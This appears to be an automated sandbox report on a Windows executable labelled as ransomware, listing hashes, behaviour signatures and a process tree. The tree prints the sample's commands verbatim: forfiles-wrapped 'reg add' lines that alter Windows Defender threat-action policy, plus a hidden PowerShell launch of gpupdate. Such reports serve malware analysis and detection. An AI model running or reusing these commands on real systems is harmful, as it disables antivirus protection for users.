Analysis
-
max time kernel
17s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
02/09/2024, 23:38
Static task
static1
Behavioral task
behavioral1
Sample
2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe
-
Size
6.7MB
-
MD5
523c9df50948340df2e82213b22c72b7
-
SHA1
9260e4afb910e4f0c98aad1bf8b9bc31f5d7467f
-
SHA256
26f9eafb7869a2bfa9af2ede0363c2a41af6839c4263f6c107ab723de9dd2e37
-
SHA512
28432c1fe74d0f74f3b2edce9cdb2a987e170cd19738384ca63be432108d17d636fc78fc4d55a84b36f7c19ea1999988cd488798064daef986784d6eb4e92c32
-
SSDEEP
196608:8BHQB/DJvDD2YxyHx96sbsWX/sD0WlHfvpeRYXqZk+:uHYvZx2dbP0AWlJQYXqZk
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1912 powershell.exe -
Indirect Command Execution 1 TTPs 5 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2424 forfiles.exe 1372 forfiles.exe 1636 forfiles.exe 2464 forfiles.exe 2280 forfiles.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2608 2504 WerFault.exe 28 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1912 powershell.exe 1912 powershell.exe 1912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1912 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2504 wrote to memory of 2316 2504 2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe 29 PID 2504 wrote to memory of 2316 2504 2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe 29 PID 2504 wrote to memory of 2316 2504 2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe 29 PID 2504 wrote to memory of 2316 2504 2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe 29 PID 2316 wrote to memory of 2424 2316 cmd.exe 31 PID 2316 wrote to memory of 2424 2316 cmd.exe 31 PID 2316 wrote to memory of 2424 2316 cmd.exe 31 PID 2316 wrote to memory of 2424 2316 cmd.exe 31 PID 2424 wrote to memory of 1700 2424 forfiles.exe 32 PID 2424 wrote to memory of 1700 2424 forfiles.exe 32 PID 2424 wrote to memory of 1700 2424 forfiles.exe 32 PID 2424 wrote to memory of 1700 2424 forfiles.exe 32 PID 1700 wrote to memory of 812 1700 cmd.exe 33 PID 1700 wrote to memory of 812 1700 cmd.exe 33 PID 1700 wrote to memory of 812 1700 cmd.exe 33 PID 1700 wrote to memory of 812 1700 cmd.exe 33 PID 2316 wrote to memory of 1372 2316 cmd.exe 34 PID 2316 wrote to memory of 1372 2316 cmd.exe 34 PID 2316 wrote to memory of 1372 2316 cmd.exe 34 PID 2316 wrote to memory of 1372 2316 cmd.exe 34 PID 1372 wrote to memory of 2040 1372 forfiles.exe 35 PID 1372 wrote to memory of 2040 1372 forfiles.exe 35 PID 1372 wrote to memory of 2040 1372 forfiles.exe 35 PID 1372 wrote to memory of 2040 1372 forfiles.exe 35 PID 2040 wrote to memory of 2036 2040 cmd.exe 36 PID 2040 wrote to memory of 2036 2040 cmd.exe 36 PID 2040 wrote to memory of 2036 2040 cmd.exe 36 PID 2040 wrote to memory of 2036 2040 cmd.exe 36 PID 2316 wrote to memory of 1636 2316 cmd.exe 37 PID 2316 wrote to memory of 1636 2316 cmd.exe 37 PID 2316 wrote to memory of 1636 2316 cmd.exe 37 PID 2316 wrote to memory of 1636 2316 cmd.exe 37 PID 1636 wrote to memory of 1652 1636 forfiles.exe 38 PID 1636 wrote to memory of 1652 1636 forfiles.exe 38 PID 1636 wrote to memory of 1652 1636 forfiles.exe 38 PID 1636 wrote to memory of 1652 1636 forfiles.exe 38 PID 1652 wrote to memory of 2200 1652 cmd.exe 39 PID 1652 wrote to memory of 2200 1652 cmd.exe 39 PID 1652 wrote to memory of 2200 1652 cmd.exe 39 PID 1652 wrote to memory of 2200 1652 cmd.exe 39 PID 2316 wrote to memory of 2464 2316 cmd.exe 40 PID 2316 wrote to memory of 2464 2316 cmd.exe 40 PID 2316 wrote to memory of 2464 2316 cmd.exe 40 PID 2316 wrote to memory of 2464 2316 cmd.exe 40 PID 2464 wrote to memory of 2428 2464 forfiles.exe 41 PID 2464 wrote to memory of 2428 2464 forfiles.exe 41 PID 2464 wrote to memory of 2428 2464 forfiles.exe 41 PID 2464 wrote to memory of 2428 2464 forfiles.exe 41 PID 2428 wrote to memory of 2700 2428 cmd.exe 42 PID 2428 wrote to memory of 2700 2428 cmd.exe 42 PID 2428 wrote to memory of 2700 2428 cmd.exe 42 PID 2428 wrote to memory of 2700 2428 cmd.exe 42 PID 2316 wrote to memory of 2280 2316 cmd.exe 43 PID 2316 wrote to memory of 2280 2316 cmd.exe 43 PID 2316 wrote to memory of 2280 2316 cmd.exe 43 PID 2316 wrote to memory of 2280 2316 cmd.exe 43 PID 2280 wrote to memory of 2460 2280 forfiles.exe 44 PID 2280 wrote to memory of 2460 2280 forfiles.exe 44 PID 2280 wrote to memory of 2460 2280 forfiles.exe 44 PID 2280 wrote to memory of 2460 2280 forfiles.exe 44 PID 2460 wrote to memory of 1912 2460 cmd.exe 45 PID 2460 wrote to memory of 1912 2460 cmd.exe 45 PID 2460 wrote to memory of 1912 2460 cmd.exe 45 PID 2460 wrote to memory of 1912 2460 cmd.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-02_523c9df50948340df2e82213b22c72b7_bkransomware.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1700 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:812
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2040 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2036
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1652 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2200
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2428 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:2840
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 2082⤵
- Program crash
PID:2608
-